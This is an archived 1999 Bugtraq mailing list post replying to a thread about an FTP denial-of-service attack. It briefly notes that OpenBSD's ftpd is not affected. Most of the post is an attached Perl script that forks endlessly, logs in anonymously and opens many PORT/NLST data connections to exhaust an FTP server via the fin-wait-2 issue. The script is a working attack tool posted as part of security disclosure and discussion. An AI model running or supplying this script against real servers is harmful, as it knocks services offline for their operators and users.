Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: FTP denial of service attack
From: avalon () COOMBS ANU EDU AU (Darren Reed)
Date: Wed, 8 Dec 1999 18:01:53 +1100


In some mail from Theo de Raadt, sie said:
[...]
The OpenBSD ftpd has never permitted more than 1 connection at a time
in PASV mode, thus this particular denial of service attack does not
work.

Excellent.

I caused myself some difficulties by accidentally starting up 400 perl
instances, though..

There's no helping pilot error ;)

Below is an attached perl script which attacks based on the fin-wait-2
`problem'.

Darren

#!/usr/bin/perl

$DOS_HOST="localhost";

use IO::Socket;

$pid = $$;
$num = 0;

while (1) {
        while (fork) {
                $sock = IO::Socket::INET->new(
                        Proto    => "tcp",
                        PeerAddr => $DOS_HOST,
                        PeerPort => "ftp(21)",
                );
                last if (!$sock);
                $me = getsockname($sock);
                ($mport, $mip) = unpack_sockaddr_in($me);

                if (!$sock) {
                        print "connect failed!\n";
                        waitpid -1,0;
                }

                $sock->autoflush(1);

                while (<$sock>) {
                        print;
                        print $sock "USER anonymous\r\n" if (/^220 .*/);
                        print $sock "PASS root () \r\n" if (/^331 .*/);

                        if (/^150 .*/) {
                                $conn[$num++] = $x->accept();
                        } elsif (/^200 .*/) {
                                print $sock "NLST\r\n";
                        } elsif (/^230 .*/ || /^226 .*/) {

                                $x = IO::Socket::INET->new(
                                        Proto    => "tcp",
                                        LocalAddr => inet_ntoa($mip),
                                        Listen => 1,
                                );
                                last if (!$x);

                                $lsock[$num] = $x;
                                $local = getsockname($x);
                                ($lport, $lip) = unpack_sockaddr_in($local);
                                ($sip = inet_ntoa($mip)) =~ s/\./,/g;
                                $lp[0] = $lport >> 8;
                                $lp[1] = $lport & 0xff;

                                print $sock "PORT $sip,$lp[1]\r\n";
                        }
                        last if (/^530 .*/);
                }
                waitpid -1,0;
        }
        sleep(5);
}


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]